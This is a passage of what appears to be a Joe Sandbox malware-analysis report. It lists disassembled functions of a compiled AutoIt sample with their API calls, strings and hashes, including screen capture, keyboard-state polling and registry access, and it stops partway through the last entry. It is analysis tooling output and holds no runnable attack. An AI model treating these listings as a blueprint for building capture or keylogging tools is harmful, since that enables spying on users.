                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006585BC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: 6f57cddb8b2e595f25deb7cb205ad86b51b9f4c7c52898e5e2df035c3f68d31b
                                                    • Instruction ID: 96a4a5a96544f05d9affe295cb2ca4671998d76f578930cb5c7ac8d8c1e70b92
                                                    • Opcode Fuzzy Hash: 6f57cddb8b2e595f25deb7cb205ad86b51b9f4c7c52898e5e2df035c3f68d31b
                                                    • Instruction Fuzzy Hash: 9A611971900209AFDF109FA4DC45AEEBBBAFF04305F148269F915B7691EB319A19CF60
                                                    Function 0067762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 006776A2
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 006776AE
                                                    • CreateCompatibleDC.GDI32(?), ref: 006776BA
                                                    • SelectObject.GDI32(00000000,?), ref: 006776C7
                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0067771B
                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00677757
                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0067777B
                                                    • SelectObject.GDI32(00000006,?), ref: 00677783
                                                    • DeleteObject.GDI32(?), ref: 0067778C
                                                    • DeleteDC.GDI32(00000006), ref: 00677793
                                                    • ReleaseDC.USER32(00000000,?), ref: 0067779E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: cc8319f89098f26979fc8294391bc8b1eb1fe1cbbd8829ce16848ecff46192a8
                                                    • Instruction ID: ed873079187068e522c3764d5b3c1a32eb25725fbe55bcc7ba5302581cfab884
                                                    • Opcode Fuzzy Hash: cc8319f89098f26979fc8294391bc8b1eb1fe1cbbd8829ce16848ecff46192a8
                                                    • Instruction Fuzzy Hash: A5513975904209EFCB15CFA8CC85EAEBBBAEF48710F14852DF94997350D771A941CB60
                                                    Function 00606BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00620B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00606C6C,?,00008000), ref: 00620BB7
                                                      • Part of subcall function 006048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006048A1,?,?,006037C0,?), ref: 006048CE
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00606D0D
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00606E5A
                                                      • Part of subcall function 006059CD: _wcscpy.LIBCMT ref: 00605A05
                                                      • Part of subcall function 0062387D: _iswctype.LIBCMT ref: 00623885
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 537147316-1018226102
                                                    • Opcode ID: 8166da723e12cd56240cd8f11d3af580549ce9e925f78a7de5119561dfb03acb
                                                    • Instruction ID: 5ee78e9b944dcd657f606d772dcdb9e76edae6cea34f1ed3952c6805472a603b
                                                    • Opcode Fuzzy Hash: 8166da723e12cd56240cd8f11d3af580549ce9e925f78a7de5119561dfb03acb
                                                    • Instruction Fuzzy Hash: 63029C705483419FC768EF24C881AAFBBE6AF98314F04492DF486972E1DB31E949CF56
                                                    Function 006045DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006045F9
                                                    • GetMenuItemCount.USER32(006C6890), ref: 0063D7CD
                                                    • GetMenuItemCount.USER32(006C6890), ref: 0063D87D
                                                    • GetCursorPos.USER32(?), ref: 0063D8C1
                                                    • SetForegroundWindow.USER32(00000000), ref: 0063D8CA
                                                    • TrackPopupMenuEx.USER32(006C6890,00000000,?,00000000,00000000,00000000), ref: 0063D8DD
                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0063D8E9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                    • String ID:
                                                    • API String ID: 2751501086-0
                                                    • Opcode ID: f6f0664abad348f2f0612b7cd03ecd442142392a4d68276a1e7a02c56e7d5582
                                                    • Instruction ID: bda5534bcfe41093f1eb9fd1cd9973911fa34b6837ae8f5c412df494f25ff365
                                                    • Opcode Fuzzy Hash: f6f0664abad348f2f0612b7cd03ecd442142392a4d68276a1e7a02c56e7d5582
                                                    • Instruction Fuzzy Hash: 9771E370640205BBEB359F24EC45FEABF66FF05368F204216F615A62E0CBB16C10DB95
                                                    Function 00678BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00678BEC
                                                    • CoInitialize.OLE32(00000000), ref: 00678C19
                                                    • CoUninitialize.OLE32 ref: 00678C23
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00678D23
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00678E50
                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00692C0C), ref: 00678E84
                                                    • CoGetObject.OLE32(?,00000000,00692C0C,?), ref: 00678EA7
                                                    • SetErrorMode.KERNEL32(00000000), ref: 00678EBA
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00678F3A
                                                    • VariantClear.OLEAUT32(?), ref: 00678F4A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                    • String ID: ,,i
                                                    • API String ID: 2395222682-3276395716
                                                    • Opcode ID: 0ece90c1a620242ea9aa95791647fc03226a087f9d9c8d64f0de38250eb78a15
                                                    • Instruction ID: 6493e89f4c42199c928a54beefaa2c5a67e761d44d8cefdf4eeb52ee97cb0e85
                                                    • Opcode Fuzzy Hash: 0ece90c1a620242ea9aa95791647fc03226a087f9d9c8d64f0de38250eb78a15
                                                    • Instruction Fuzzy Hash: 90C113B1648305AFD700DF64C88896BB7EAFF88348F10896DF5899B251DB71ED06CB52
                                                    Function 006810A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00680038,?,?), ref: 006810BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                    • API String ID: 3964851224-909552448
                                                    • Opcode ID: ed0208c514e07237399a8517893692b63cd58355a42b40f95df68e43d4ae9a22
                                                    • Instruction ID: a01c3c8443dda2616ad4c3dcd008cfb8289cdafd17a36f5bbc474182d1f2cd6d
                                                    • Opcode Fuzzy Hash: ed0208c514e07237399a8517893692b63cd58355a42b40f95df68e43d4ae9a22
                                                    • Instruction Fuzzy Hash: E341917014125A8FDF14FF94ECA1AEB372BAF16300F004558FC915B692DB70AA9BCB60
                                                    Function 00665569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                      • Part of subcall function 00607A84: _memmove.LIBCMT ref: 00607B0D
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006655D2
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006655E8
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006655F9
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0066560B
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0066561C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: SendString$_memmove
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 2279737902-1007645807
                                                    • Opcode ID: e2086963674f15a45a83e21b58c08c9842bf4036e7306a46a9e27edcbef996fd
                                                    • Instruction ID: ee823ee2e2c682a2dcc45f3678b52b5538ae463e6352f19bf101553b24c230a7
                                                    • Opcode Fuzzy Hash: e2086963674f15a45a83e21b58c08c9842bf4036e7306a46a9e27edcbef996fd
                                                    • Instruction Fuzzy Hash: 9B119470AA016979D764B7A5CC4ADFF7BBEEF95B00F40046DB402E20D1EEA01D45CAB5
                                                    Function 006648F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 208665112-3771769585
                                                    • Opcode ID: e52e19d90c5fd909527e7416b545613ba86aa484299183ed27e26536ec2aa3ba
                                                    • Instruction ID: a4503c01ab78132c6b6bfeef6b6814ef9e2e74d25bf0de5d9fc7cf24e2bd68ae
                                                    • Opcode Fuzzy Hash: e52e19d90c5fd909527e7416b545613ba86aa484299183ed27e26536ec2aa3ba
                                                    • Instruction Fuzzy Hash: 27110231948129BBDB20AB20AC0AEDB77BE9F01710F0002BAF40496191EF709AC1CB65
                                                    Function 00665217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • timeGetTime.WINMM ref: 0066521C
                                                      • Part of subcall function 00620719: timeGetTime.WINMM(?,75C0B400,00610FF9), ref: 0062071D
                                                    • Sleep.KERNEL32(0000000A), ref: 00665248
                                                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0066526C
                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0066528E
                                                    • SetActiveWindow.USER32 ref: 006652AD
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006652BB
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 006652DA
                                                    • Sleep.KERNEL32(000000FA), ref: 006652E5
                                                    • IsWindow.USER32 ref: 006652F1
                                                    • EndDialog.USER32(00000000), ref: 00665302
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    • Opcode ID: d2aa248d2d4b5120babfdbec897d531faf105a0ac38e862c0567992dee8b5c29
                                                    • Instruction ID: 0e6b11e10021c375d9a89f1022d1be5a667654dd2cde916d0fff9842885c2913
                                                    • Opcode Fuzzy Hash: d2aa248d2d4b5120babfdbec897d531faf105a0ac38e862c0567992dee8b5c29
                                                    • Instruction Fuzzy Hash: C421AC70204704BFE7005F60EC8AE7A3B6BEB55786F503528F003922B1EB619E408B62
                                                    Function 0066D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                    • CoInitialize.OLE32(00000000), ref: 0066D855
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0066D8E8
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 0066D8FC
                                                    • CoCreateInstance.OLE32(00692D7C,00000000,00000001,006BA89C,?), ref: 0066D948
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0066D9B7
                                                    • CoTaskMemFree.OLE32(?,?), ref: 0066DA0F
                                                    • _memset.LIBCMT ref: 0066DA4C
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0066DA88
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0066DAAB
                                                    • CoTaskMemFree.OLE32(00000000), ref: 0066DAB2
                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0066DAE9
                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 0066DAEB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                    • String ID:
                                                    • API String ID: 1246142700-0
                                                    • Opcode ID: 494ebfc10c687417101eeeb455888abc66ffb36197ad9dec0b1e5e86ee27312f
                                                    • Instruction ID: a4d9dc7e58f4611d2370ffd0f9419822a1d5b556eff7d96c1d8a3823b745dc5d
                                                    • Opcode Fuzzy Hash: 494ebfc10c687417101eeeb455888abc66ffb36197ad9dec0b1e5e86ee27312f
                                                    • Instruction Fuzzy Hash: B5B1EB75A00109AFDB44DFA4C888DAEBBFAFF48314B1485A9F909EB251DB30ED45CB54
                                                    Function 0066052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 006605A7
                                                    • SetKeyboardState.USER32(?), ref: 00660612
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00660632
                                                    • GetKeyState.USER32(000000A0), ref: 00660649
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00660678
                                                    • GetKeyState.USER32(000000A1), ref: 00660689
                                                    • GetAsyncKeyState.USER32(00000011), ref: 006606B5
                                                    • GetKeyState.USER32(00000011), ref: 006606C3
                                                    • GetAsyncKeyState.USER32(00000012), ref: 006606EC
                                                    • GetKeyState.USER32(00000012), ref: 006606FA
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00660723
                                                    • GetKeyState.USER32(0000005B), ref: 00660731
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 906ed54ac380cc74e122a3982ba94106c5e81db2acd152223ee51bea6e0b8671
                                                    • Instruction ID: 9c141fc6ab4d17dff0519f4cdc8eeab372c55330e418c078a0e470c45ac8e012
                                                    • Opcode Fuzzy Hash: 906ed54ac380cc74e122a3982ba94106c5e81db2acd152223ee51bea6e0b8671
                                                    • Instruction Fuzzy Hash: 5351DB70A0478429FB35DBB0C9547EBBFB69F12380F0845ADD5C25B2C2DA64AB8CCB55
                                                    Function 0065C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 0065C746
                                                    • GetWindowRect.USER32(00000000,?), ref: 0065C758
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0065C7B6
                                                    • GetDlgItem.USER32(?,00000002), ref: 0065C7C1
                                                    • GetWindowRect.USER32(00000000,?), ref: 0065C7D3
                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0065C827
                                                    • GetDlgItem.USER32(?,000003E9), ref: 0065C835
                                                    • GetWindowRect.USER32(00000000,?), ref: 0065C846
                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0065C889
                                                    • GetDlgItem.USER32(?,000003EA), ref: 0065C897
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0065C8B4
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0065C8C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: e0a377d361c8e737065e1584921ed4865d990cd05ad0d00ecf5654e905d262ab
                                                    • Instruction ID: 677fc903212a66fc29953938e63c233e197e14eb3b3bd3300568b9b7111696e4
                                                    • Opcode Fuzzy Hash: e0a377d361c8e737065e1584921ed4865d990cd05ad0d00ecf5654e905d262ab
                                                    • Instruction Fuzzy Hash: 43512171B00205BFDB18CF69DD99AAEBBB6EB88311F14822DF915D7290D7709D44CB50
                                                    Function 0060201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00601B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00602036,?,00000000,?,?,?,?,006016CB,00000000,?), ref: 00601B9A
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006020D3
                                                    • KillTimer.USER32(-00000001,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0060216E
                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0063BEF6
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0063BF27
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0063BF3E
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006016CB,00000000,?,?,00601AE2,?,?), ref: 0063BF5A
                                                    • DeleteObject.GDI32(00000000), ref: 0063BF6C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 641708696-0
                                                    • Opcode ID: 9093a7270c2472e0c39c8a1b7774c218fffb4c010ff4ec4a19a5df2542d2c5d6
                                                    • Instruction ID: 18c12aaada57e004986bf5efd9a5db7d1ac2a404488c3253e0478b6cedb60cd3
                                                    • Opcode Fuzzy Hash: 9093a7270c2472e0c39c8a1b7774c218fffb4c010ff4ec4a19a5df2542d2c5d6
                                                    • Instruction Fuzzy Hash: 9D618830141711EFDB299F14DD58B6AB7F3FF40316F10A92CE64286AA0C771A891DFA5
                                                    Function 006021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006025DB: GetWindowLongW.USER32(?,000000EB), ref: 006025EC
                                                    • GetSysColor.USER32(0000000F), ref: 006021D3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
